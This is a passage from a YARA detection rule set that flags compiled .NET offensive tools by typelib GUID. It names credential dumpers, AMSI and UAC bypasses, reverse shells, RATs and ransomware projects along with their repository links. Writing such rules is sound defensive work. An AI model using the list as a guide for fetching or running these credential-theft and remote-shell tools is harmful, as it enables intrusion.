    hash7 = "8a81b3a75e783765fe4335a2a6d1e126b12e09380edc4da8319efd9288d88819"
  strings:
    $s1 = "OpenProcessToken() error: 0x%08X" ascii fullword
    $s2 = "%d dumped" ascii fullword
    $s3 = "AdjustTokenPrivileges() error: 0x%08X" ascii fullword
    $s4 = "\\SAM-%u.dmp" ascii fullword
  condition:
    all of them
}

rule HKTL_NET_GUID_CSharpSetThreadContext {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/djhohnstein/CSharpSetThreadContext"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "a1e28c8c-b3bd-44de-85b9-8aa7c18a714d" ascii wide nocase
    $typelibguid1 = "87c5970e-0c77-4182-afe2-3fe96f785ebb" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DLL_Injection {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/ihack4falafel/DLL-Injection"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "3d7e1433-f81a-428a-934f-7cc7fcf1149d" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_LimeUSB_Csharp {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/LimeUSB-Csharp"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "94ea43ab-7878-4048-a64e-2b21b3b4366d" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Ladon {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/k8gege/Ladon"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "c335405f-5df2-4c7d-9b53-d65adfbed412" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_WhiteListEvasion {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/khr0x40sh/WhiteListEvasion"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "858386df-4656-4a1e-94b7-47f6aa555658" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Lime_Downloader {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/Lime-Downloader"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "ec7afd4c-fbc4-47c1-99aa-6ebb05094173" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DarkEye {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/K1ngSoul/DarkEye"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "0bdb9c65-14ed-4205-ab0c-ea2151866a7f" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpKatz {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/b4rtik/SharpKatz"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "8568b4c1-2940-4f6c-bf4e-4383ef268be9" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_ExternalC2 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/ryhanson/ExternalC2"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "7266acbb-b10d-4873-9b99-12d2043b1d4e" ascii wide nocase
    $typelibguid1 = "5d9515d0-df67-40ed-a6b2-6619620ef0ef" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Povlsomware {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/povlteksttv/Povlsomware"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "fe0d5aa7-538f-42f6-9ece-b141560f7781" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_RunShellcode {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/zerosum0x0/RunShellcode"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "a3ec18a3-674c-4131-a7f5-acbed034b819" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpLoginPrompt {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/shantanu561993/SharpLoginPrompt"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "c12e69cd-78a0-4960-af7e-88cbd794af97" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Adamantium_Thief {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/LimerBoy/Adamantium-Thief"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "e6104bc9-fea9-4ee9-b919-28156c1f2ede" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_PSByPassCLM {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/padovah4ck/PSByPassCLM"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "46034038-0113-4d75-81fd-eb3b483f2662" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_physmem2profit {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/FSecureLABS/physmem2profit"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "814708c9-2320-42d2-a45f-31e42da06a94" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_NoAmci {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/med0x2e/NoAmci"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "352e80ec-72a5-4aa6-aabe-4f9a20393e8e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpBlock {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/CCob/SharpBlock"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "3cf25e04-27e4-4d19-945e-dadc37c81152" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_nopowershell {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/bitsadmin/nopowershell"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "555ad0ac-1fdb-4016-8257-170a74cb2f55" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_LimeLogger {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/LimeLogger"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "068d14ef-f0a1-4f9d-8e27-58b4317830c6" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_AggressorScripts {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/harleyQu1nn/AggressorScripts"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "afd1ff09-2632-4087-a30c-43591f32e4e8" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Gopher {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/EncodeGroup/Gopher"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "b5152683-2514-49ce-9aca-1bc43df1e234" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_AVIator {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/Ch0pin/AVIator"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "4885a4a3-4dfa-486c-b378-ae94a221661a" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_njCrypter {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/0xPh0enix/njCrypter"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "8a87b003-4b43-467b-a509-0c8be05bf5a5" ascii wide nocase
    $typelibguid1 = "80b13bff-24a5-4193-8e51-c62a414060ec" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpMiniDump {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/b4rtik/SharpMiniDump"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "6ffccf81-6c3c-4d3f-b15f-35a86d0b497f" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_CinaRAT {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/wearelegal/CinaRAT"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "8586f5b1-2ef4-4f35-bd45-c6206fdc0ebc" ascii wide nocase
    $typelibguid1 = "fe184ab5-f153-4179-9bf5-50523987cf1f" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_ToxicEye {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/LimerBoy/ToxicEye"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "1bcfe538-14f4-4beb-9a3f-3f9472794902" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Disable_Windows_Defender {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/Disable-Windows-Defender"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "501e3fdc-575d-492e-90bc-703fb6280ee2" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DInvoke_PoC {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/dtrizna/DInvoke_PoC"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "5a869ab2-291a-49e6-a1b7-0d0f051bef0e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_ReverseShell {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/chango77747/ReverseShell"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "980109e4-c988-47f9-b2b3-88d63fababdc" ascii wide nocase
    $typelibguid1 = "8abe8da1-457e-4933-a40d-0958c8925985" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpC2 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/SharpC2/SharpC2"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "62b9ee4f-1436-4098-9bc1-dd61b42d8b81" ascii wide nocase
    $typelibguid1 = "d2f17a91-eb2d-4373-90bf-a26e46c68f76" ascii wide nocase
    $typelibguid2 = "a9db9fcc-7502-42cd-81ec-3cd66f511346" ascii wide nocase
    $typelibguid3 = "ca6cc2ee-75fd-4f00-b687-917fa55a4fae" ascii wide nocase
    $typelibguid4 = "a1167b68-446b-4c0c-a8b8-2a7278b67511" ascii wide nocase
    $typelibguid5 = "4d8c2a88-1da5-4abe-8995-6606473d7cf1" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SneakyExec {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/HackingThings/SneakyExec"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "612590aa-af68-41e6-8ce2-e831f7fe4ccc" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_UrbanBishopLocal {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/slyd0g/UrbanBishopLocal"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "88b8515e-a0e8-4208-a9a0-34b01d7ba533" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpShell {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/cobbr/SharpShell"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "bdba47c5-e823-4404-91d0-7f6561279525" ascii wide nocase
    $typelibguid1 = "b84548dc-d926-4b39-8293-fa0bdef34d49" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_EvilWMIProvider {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/sunnyc7/EvilWMIProvider"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "a4020626-f1ec-4012-8b17-a2c8a0204a4b" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_GadgetToJScript {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/med0x2e/GadgetToJScript"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "af9c62a1-f8d2-4be0-b019-0a7873e81ea9" ascii wide nocase
    $typelibguid1 = "b2b3adb0-1669-4b94-86cb-6dd682ddbea3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_AzureCLI_Extractor {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/0x09AL/AzureCLI-Extractor"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "a73cad74-f8d6-43e6-9a4c-b87832cdeace" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_UAC_Escaper {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/UAC-Escaper"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "95359279-5cfa-46f6-b400-e80542a7336a" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_HTTPSBeaconShell {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/limbenjamin/HTTPSBeaconShell"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "aca853dc-9e74-4175-8170-e85372d5f2a9" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_AmsiScanBufferBypass {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/rasta-mouse/AmsiScanBufferBypass"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "431ef2d9-5cca-41d3-87ba-c7f5e4582dd2" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_ShellcodeLoader {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/Hzllaga/ShellcodeLoader"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "a48fe0e1-30de-46a6-985a-3f2de3c8ac96" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_KeystrokeAPI {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/fabriciorissetto/KeystrokeAPI"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "f6fec17e-e22d-4149-a8a8-9f64c3c905d3" ascii wide nocase
    $typelibguid1 = "b7aa4e23-39a4-49d5-859a-083c789bfea2" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_ShellCodeRunner {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/antman1p/ShellCodeRunner"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "634874b7-bf85-400c-82f0-7f3b4659549a" ascii wide nocase
    $typelibguid1 = "2f9c3053-077f-45f2-b207-87c3c7b8f054" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_OffensiveCSharp {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/diljith369/OffensiveCSharp"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "6c3fbc65-b673-40f0-b1ac-20636df01a85" ascii wide nocase
    $typelibguid1 = "2bad9d69-ada9-4f1e-b838-9567e1503e93" ascii wide nocase
    $typelibguid2 = "512015de-a70f-4887-8eae-e500fd2898ab" ascii wide nocase
    $typelibguid3 = "1ee4188c-24ac-4478-b892-36b1029a13b3" ascii wide nocase
    $typelibguid4 = "5c6b7361-f9ab-41dc-bfa0-ed5d4b0032a8" ascii wide nocase
    $typelibguid5 = "048a6559-d4d3-4ad8-af0f-b7f72b212e90" ascii wide nocase
    $typelibguid6 = "3412fbe9-19d3-41d8-9ad2-6461fcb394dc" ascii wide nocase
    $typelibguid7 = "9ea4e0dc-9723-4d93-85bb-a4fcab0ad210" ascii wide nocase
    $typelibguid8 = "6d2b239c-ba1e-43ec-8334-d67d52b77181" ascii wide nocase
    $typelibguid9 = "42e8b9e1-0cf4-46ae-b573-9d0563e41238" ascii wide nocase
    $typelibguid10 = "0d15e0e3-bcfd-4a85-adcd-0e751dab4dd6" ascii wide nocase
    $typelibguid11 = "644dfd1a-fda5-4948-83c2-8d3b5eda143a" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SHAPESHIFTER {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/matterpreter/SHAPESHIFTER"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "a3ddfcaa-66e7-44fd-ad48-9d80d1651228" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Evasor {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/cyberark/Evasor"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "1c8849ef-ad09-4727-bf81-1f777bd1aef8" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Stracciatella {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/mgeeky/Stracciatella"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "eaafa0ac-e464-4fc4-9713-48aa9a6716fb" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_logger {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/xxczaki/logger"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "9e92a883-3c8b-4572-a73e-bb3e61cfdc16" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Internal_Monologue {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/eladshamir/Internal-Monologue"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "0c0333db-8f00-4b68-b1db-18a9cacc1486" ascii wide nocase
    $typelibguid1 = "84701ace-c584-4886-a3cf-76c57f6e801a" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_GRAT2 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/r3nhat/GRAT2"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "5e7fce78-1977-444f-a18e-987d708a2cff" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_PowerShdll {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/p3nt4/PowerShdll"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "36ebf9aa-2f37-4f1d-a2f1-f2a45deeaf21" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_CsharpAmsiBypass {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/WayneJLee/CsharpAmsiBypass"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "4ab3b95d-373c-4197-8ee3-fe0fa66ca122" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_HastySeries {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/obscuritylabs/HastySeries"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "8435531d-675c-4270-85bf-60db7653bcf6" ascii wide nocase
    $typelibguid1 = "47db989f-7e33-4e6b-a4a5-c392b429264b" ascii wide nocase
    $typelibguid2 = "300c7489-a05f-4035-8826-261fa449dd96" ascii wide nocase
    $typelibguid3 = "41bf8781-ae04-4d80-b38d-707584bf796b" ascii wide nocase
    $typelibguid4 = "620ed459-18de-4359-bfb0-6d0c4841b6f6" ascii wide nocase
    $typelibguid5 = "91e7cdfe-0945-45a7-9eaa-0933afe381f2" ascii wide nocase
    $typelibguid6 = "c28e121a-60ca-4c21-af4b-93eb237b882f" ascii wide nocase
    $typelibguid7 = "698fac7a-bff1-4c24-b2c3-173a6aae15bf" ascii wide nocase
    $typelibguid8 = "63a40d94-5318-42ad-a573-e3a1c1284c57" ascii wide nocase
    $typelibguid9 = "56b8311b-04b8-4e57-bb58-d62adc0d2e68" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DreamProtectorFree {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/Paskowsky/DreamProtectorFree"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "f7e8a902-2378-426a-bfa5-6b14c4b40aa3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_RedSharp {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/padovah4ck/RedSharp"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "30b2e0cf-34dd-4614-a5ca-6578fb684aea" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_ESC {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NetSPI/ESC"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "06260ce5-61f4-4b81-ad83-7d01c3b37921" ascii wide nocase
    $typelibguid1 = "87fc7ede-4dae-4f00-ac77-9c40803e8248" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Csharp_Loader {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/Csharp-Loader"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "5fd7f9fc-0618-4dde-a6a0-9faefe96c8a1" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_bantam {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/gellin/bantam"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "14c79bda-2ce6-424d-bd49-4f8d68630b7b" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpTask {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/jnqpblc/SharpTask"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "13e90a4d-bf7a-4d5a-9979-8b113e3166be" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_WindowsPlague {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/RITRedteam/WindowsPlague"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "cdf8b024-70c9-413a-ade3-846a43845e99" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Misc_CSharp {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/jnqpblc/Misc-CSharp"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "d1421ba3-c60b-42a0-98f9-92ba4e653f3d" ascii wide nocase
    $typelibguid1 = "2afac0dd-f46f-4f95-8a93-dc17b4f9a3a1" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpSpray {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/jnqpblc/SharpSpray"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "51c6e016-1428-441d-82e9-bb0eb599bbc8" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Obfuscator {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/3xpl01tc0d3r/Obfuscator"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "8fe5b811-a2cb-417f-af93-6a3cf6650af1" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SafetyKatz {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/GhostPack/SafetyKatz"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "8347e81b-89fc-42a9-b22c-f59a6a572dec" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Dropless_Malware {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/Dropless-Malware"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "23b739f7-2355-491e-a7cd-a8485d39d6d6" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_UAC_SilentClean {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/EncodeGroup/UAC-SilentClean"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "948152a4-a4a1-4260-a224-204255bfee72" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DesktopGrabber {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/DesktopGrabber"
